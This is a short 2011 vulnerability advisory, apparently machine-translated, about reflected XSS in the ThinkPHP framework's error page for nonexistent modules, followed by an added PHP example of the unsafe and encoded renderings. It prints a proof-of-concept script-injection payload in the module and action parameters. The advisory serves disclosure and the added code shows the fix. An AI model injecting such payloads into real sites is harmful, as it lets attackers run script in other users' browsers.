ThinkPHP development framework XSS vulnerability warning - the black bar safety net

ID MYHACK58:62201132721
Type myhack58
Reporter Anonymous
Modified 2011-12-26T00:00:00


Brief description: The open-source PHP development framework has an XSS vulnerability by default, so every system developed with the framework has the XSS vulnerability.

Detailed description: The error for a module that does not exist is not handled properly, leading to an XSS vulnerability.

Proof of vulnerability:

To Super Rangers test'"><script>alert(3);</script><"&a=login'"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&'"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&

Go and see

Solution: set up a better filter for it~~~

Author Hxai11
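
The flaw and fix described above, as an added example that is not part of the original advisory and is not ThinkPHP's own code: a hypothetical dispatcher whose error page for a nonexistent module echoes the requested name, next to a version that HTML-encodes it and allow-lists module names. The function names, the module list and the sample input are assumptions made for illustration.

```php
<?php
// Added illustration; not ThinkPHP source. All function names are hypothetical.

// Constructed allow-list of modules the application actually provides.
const KNOWN_MODULES = ['Index', 'User', 'Help'];

// Vulnerable pattern: the requested name is copied into the HTML error page as-is.
function renderMissingModuleUnsafe(string $module): string
{
    return '<p>Module does not exist: ' . $module . '</p>';
}

// Hardened pattern: encode for the HTML context before output.
function renderMissingModuleSafe(string $module): string
{
    $encoded = htmlspecialchars($module, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p>Module does not exist: ' . $encoded . '</p>';
}

// Dispatcher: check the name's shape, then the allow-list; never echo raw input.
function dispatch(string $module): array
{
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_]{0,63}$/D', $module)) {
        // Malformed names get a fixed message that contains no request data.
        return [400, '<p>Invalid module name.</p>'];
    }
    if (!in_array($module, KNOWN_MODULES, true)) {
        return [404, renderMissingModuleSafe($module)];
    }
    return [200, '<p>Module ' . htmlspecialchars($module, ENT_QUOTES, 'UTF-8') . ' loaded.</p>'];
}

// Constructed sample input modelled on the markup-breaking value shown on the page.
$sample = 'test\'"><script>alert(3);</script><"';

// Unsafe renderer: the markup in the value becomes part of the page.
echo renderMissingModuleUnsafe($sample), "\n";
// Safe renderer: the same value is emitted as inert text.
echo renderMissingModuleSafe($sample), "\n";
// Dispatcher with the malformed name, then with a well-formed but unknown module.
[$status, $body] = dispatch($sample);
echo $status, ' ', $body, "\n";
[$status, $body] = dispatch('Nope');
echo $status, ' ', $body, "\n";
```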